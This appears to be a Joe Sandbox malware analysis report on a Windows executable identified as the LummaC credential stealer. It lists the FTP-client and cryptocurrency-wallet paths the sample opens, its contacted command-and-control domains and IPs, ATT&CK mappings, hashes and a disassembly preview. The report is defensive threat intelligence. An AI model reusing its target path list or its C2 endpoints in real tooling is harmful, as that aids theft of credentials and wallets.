            Tries to harvest and steal ftp login credentials
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Tries to steal Crypto Currency Wallets
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
            Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 7748, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 7748, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            Process Injection            		34
            Virtualization/Sandbox Evasion            		2
            OS Credential Dumping            		741
            Security Software Discovery            		Remote Services1
            Archive Collected Data            		11
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter            		Boot or Logon Initialization Scripts1
            DLL Side-Loading            		1
            Process Injection            		LSASS Memory34
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol41
            Data from Local System            		2
            Non-Application Layer Protocol            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            PowerShell            		Logon Script (Windows)Logon Script (Windows)1
            Deobfuscate/Decode Files or Information            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin SharesData from Network Shared Drive113
            Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
            Obfuscated Files or Information            		NTDS1
            File and Directory Discovery            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
            Software Packing            		LSA Secrets223
            System Information Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            file.exe100%AviraTR/Crypt.TPM.Gen
            file.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://cook-rain.sbs/apiMl100%Avira URL Cloudmalware
            https://cook-rain.sbs/api:n100%Avira URL Cloudmalware
            https://cook-rain.sbs/api)100%Avira URL Cloudmalware
            https://contile-images.services.mozilla.com0%Avira URL Cloudsafe
            https://cook-rain.sbs/P100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            cook-rain.sbs
            		188.114.97.3
            		truefalse
              		high
              s-part-0017.t-0009.t-msedge.net
              		13.107.246.45
              		truefalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://cook-rain.sbs/apifalse
                  		high
                  p3ar11fter.sbsfalse
                    		high
                    peepburry828.sbsfalse
                      		high
                      p10tgrace.sbsfalse
                        		high
                        processhol.sbsfalse
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.1373982930.00000000056FB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374055399.00000000056F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374195615.00000000056F8000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.1373982930.00000000056FB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374055399.00000000056F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374195615.00000000056F8000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.1373982930.00000000056FB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374055399.00000000056F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374195615.00000000056F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Prfile.exe, 00000000.00000003.1443482290.0000000000F7D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://cook-rain.sbs/file.exe, 00000000.00000002.1546637487.0000000000F01000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1484354122.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1520806713.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1546918977.0000000000F70000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.1373982930.00000000056FB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374055399.00000000056F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374195615.00000000056F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.1420825256.00000000056E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15e498ec2b39921665a1fbc954bff40a8106629178eadc64file.exe, 00000000.00000003.1443519497.0000000000F7A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1466794753.0000000000F7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.1373982930.00000000056FB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374055399.00000000056F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374195615.00000000056F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.1420825256.00000000056E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://cook-rain.sbs/api:nfile.exe, 00000000.00000002.1546857241.0000000000F51000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://www.ecosia.org/newtab/file.exe, 00000000.00000003.1373982930.00000000056FB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374055399.00000000056F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374195615.00000000056F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.1421874521.00000000059E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpgfile.exe, 00000000.00000003.1443482290.0000000000F7D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.1373982930.00000000056FB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374055399.00000000056F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374195615.00000000056F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://cook-rain.sbs/apiMlfile.exe, 00000000.00000003.1520903809.0000000000F51000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700file.exe, 00000000.00000003.1443482290.0000000000F7D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://cook-rain.sbs/apiYfile.exe, 00000000.00000002.1546637487.0000000000F01000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://x1.c.lencr.org/0file.exe, 00000000.00000003.1420825256.00000000056E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://x1.i.lencr.org/0file.exe, 00000000.00000003.1420825256.00000000056E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYifile.exe, 00000000.00000003.1443482290.0000000000F7D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.1373982930.00000000056FB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374055399.00000000056F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374195615.00000000056F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.1420825256.00000000056E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://contile-images.services.mozilla.comfile.exe, 00000000.00000003.1443519497.0000000000F7A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1466794753.0000000000F7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://cook-rain.sbs/api)file.exe, 00000000.00000003.1420595420.0000000000F74000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    		unknown
                                                                    http://www.microsoft.cfile.exe, 00000000.00000003.1520903809.0000000000F46000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&ctafile.exe, 00000000.00000003.1443519497.0000000000F7A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1466794753.0000000000F7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.1421874521.00000000059E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.1373982930.00000000056FB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374055399.00000000056F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1374195615.00000000056F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://cook-rain.sbs/Pfile.exe, 00000000.00000002.1546637487.0000000000F01000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: malware
                                                                            		unknown

                                                                            World Map of Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public IPs

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            188.114.97.3
                                                                            		cook-rain.sbsEuropean Union
                                                                            		13335CLOUDFLARENETUSfalse

                                                                            General Information

                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                            Analysis ID:1560145
                                                                            Start date and time:2024-11-21 13:09:12 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 4m 23s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:5
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:file.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                                            EGA Information:
                                                                            • Successful, ratio: 100%
                                                                            HCA Information:Failed
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Stop behavior analysis, all processes terminated

                                                                            Warnings

                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                            • VT rate limit hit for: file.exe

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            TimeTypeDescription
                                                                            07:10:14API Interceptor8x Sleep call for process: file.exe modified

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            188.114.97.3RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                            • www.rgenerousrs.store/o362/
                                                                            A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                            • www.beylikduzu616161.xyz/2nga/
                                                                            Delivery_Notification_00000260791.doc.jsGet hashmaliciousUnknownBrowse
                                                                            • radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
                                                                            ce.vbsGet hashmaliciousUnknownBrowse
                                                                            • paste.ee/d/lxvbq
                                                                            Label_00000852555.doc.jsGet hashmaliciousUnknownBrowse
                                                                            • tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
                                                                            PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                                            • www.ssrnoremt-rise.sbs/3jsc/
                                                                            QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • filetransfer.io/data-package/zWkbOqX7/download
                                                                            http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                            • kklk16.bsyo45ksda.top/favicon.ico
                                                                            gusetup.exeGet hashmaliciousUnknownBrowse
                                                                            • www.glarysoft.com/update/glary-utilities/pro/pro50/
                                                                            Online Interview Scheduling Form.lnkGet hashmaliciousDucktailBrowse
                                                                            • gmtagency.online/api/check

                                                                            Domains

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            cook-rain.sbsfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                            • 188.114.96.3
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 188.114.96.3
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 188.114.96.3
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 188.114.97.3
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 188.114.97.3
                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                            • 188.114.96.3
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 188.114.96.3
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 188.114.96.3
                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                            • 188.114.97.3
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 188.114.97.3
                                                                            s-part-0017.t-0009.t-msedge.netfile.exeGet hashmaliciousUnknownBrowse
                                                                            • 13.107.246.45
                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                            • 13.107.246.45
                                                                            Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 13.107.246.45
                                                                            APPENDIX FORM_N#U00b045013-20241120.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                            • 13.107.246.45
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 13.107.246.45
                                                                            Payslip-21 November, 2024 ZmPQwjYq1NGSTsWga2.htmGet hashmaliciousBlackHacker JS ObfuscatorBrowse
                                                                            • 13.107.246.45
                                                                            phish_alert_sp2_2.0.0.0.emlGet hashmaliciousHTMLPhisherBrowse
                                                                            • 13.107.246.45
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 13.107.246.45
                                                                            CB1.exeGet hashmaliciousBlackMoonBrowse
                                                                            • 13.107.246.45
                                                                            +11375 Caller left Vc MsG 8b1538917f01661e6746a0528d545dbeac3b40a5- 73945.msgGet hashmaliciousHtmlDropperBrowse
                                                                            • 13.107.246.45

                                                                            ASNs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            CLOUDFLARENETUSMV BBG MUARA Ship's Particulars.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 104.26.12.205
                                                                            CONTRACT COPY PRN00720387_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                            • 188.114.97.3
                                                                            https://bitly.cx/aMW9O9Get hashmaliciousUnknownBrowse
                                                                            • 188.114.96.3
                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                            • 188.114.96.3
                                                                            Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 188.114.97.3
                                                                            PO-841122676_g787.exeGet hashmaliciousGuLoaderBrowse
                                                                            • 188.114.97.3
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 188.114.96.3
                                                                            Payslip-21 November, 2024 ZmPQwjYq1NGSTsWga2.htmGet hashmaliciousBlackHacker JS ObfuscatorBrowse
                                                                            • 104.17.25.14
                                                                            phish_alert_sp2_2.0.0.0.emlGet hashmaliciousHTMLPhisherBrowse
                                                                            • 1.1.1.1
                                                                            CHARIKLIA JUNIOR DETAILS.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 104.26.12.205

                                                                            JA3 Fingerprints

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                            • 188.114.97.3
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 188.114.97.3
                                                                            MDE_File_Sample_37ce4d95fd579c36340b1d1490e2ef7623af4bb3.zipGet hashmaliciousLummaCBrowse
                                                                            • 188.114.97.3
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 188.114.97.3
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 188.114.97.3
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 188.114.97.3
                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                            • 188.114.97.3
                                                                            kXPgmYpAPg.docGet hashmaliciousUnknownBrowse
                                                                            • 188.114.97.3
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 188.114.97.3
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 188.114.97.3

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            No created / dropped files found

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Entropy (8bit):7.947596249136269
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:file.exe
                                                                            File size:1'843'200 bytes
                                                                            MD5:02fc2c82de8b775d97a32a39e1d34960
                                                                            SHA1:74496749c3f724136f259865d542221a22eac880
                                                                            SHA256:3231ef2658fb47a9a80f3ea5238ff1ed3afd67384a55335e9bce3660adf6b4f6
                                                                            SHA512:068084e5b8c5bb69b0ab1465350eef4833b649f1bcfc2b6cf07d8ace32f2382b2dcf732c773edef9261bd2b83ae78493168dd3f5df9ad13859297d3cd3a92386
                                                                            SSDEEP:49152:tT0EQS58zoFESwPOxz3rK2xp78Z/36krqSsJ5zmn:tTXJ58zoFESXxz3m89M/36Ga5E
                                                                            TLSH:94853395FF0265F8D5A5B0705DFBA89B7739936638FA8C6993C11728616FCE62203C30
                                                                            File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....r;g............................. I...........@..........................PI.....f.....@.................................\p..p..

                                                                            File Icon

                                                                            Icon Hash:90cececece8e8eb0

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x892000
                                                                            Entrypoint Section:.taggant
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x673B72E6 [Mon Nov 18 17:01:26 2024 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:6
                                                                            OS Version Minor:0
                                                                            File Version Major:6
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:6
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            jmp 00007F45D47E61EAh
                                                                            paddd mm3, qword ptr [ebx]
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add cl, ch
                                                                            add byte ptr [eax], ah
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax+eax*4], cl
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            adc byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            pop es
                                                                            or al, byte ptr [eax]
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], dh
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [edi], bl
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [ecx], ah
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [edi], al
                                                                            or al, byte ptr [eax]
                                                                            add byte ptr [ecx], al
                                                                            or al, byte ptr [eax]
                                                                            add byte ptr [esi], al
                                                                            or al, byte ptr [eax]
                                                                            add byte ptr [edx], al
                                                                            or al, byte ptr [eax]
                                                                            add byte ptr [eax], al
